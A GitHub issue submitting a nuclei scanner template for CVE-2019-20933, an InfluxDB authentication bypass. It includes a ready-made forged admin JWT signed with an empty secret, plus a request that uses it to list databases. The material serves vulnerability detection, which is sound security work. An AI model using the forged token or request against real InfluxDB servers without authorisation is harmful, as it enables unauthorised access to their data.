### ISSUE TITLE
CVE-2019-20933 - InfluxDB authentication bypass

### ISSUE THREAD

**Issue by c-sh0** [projectdiscovery/nuclei-templates#3788]
### Template Information:
CVE-2019-20933:  InfluxDB before 1.7.6 has an authentication bypass vulnerability
- Reads {{token}} var from file 

An example `admin` user token with an empty shared secret and an expiration date of: 9999999/12/31
```eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjozMTU1MDczNTI3MTYwMDB9.iny1LZi559E8IiXmKr9sT4Vu4z_iAWKHQniMoySUJNI```

### Nuclei Template:
```yaml
id: CVE-2019-20933

info:
  name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret
  author: c-sh0
  severity: critical
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
    - https://github.com/influxdata/influxdb/issues/12927
    - https://github.com/c-sh0/security/blob/master/influxdb.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2019-20933
    cwe-id: CWE-287
  tags: cve,cve-2019,influxdb,auth-bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/query?q=SHOW%20DATABASES"
    headers:
      Authorization: Bearer {{token}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"results":'
          - '"name":"databases"'
        condition: and
```
![influx-auth-bypass](https://user-images.githubusercontent.com/25989137/155862077-a0c6f472-37f9-4174-ac99-1035d2963852.png)
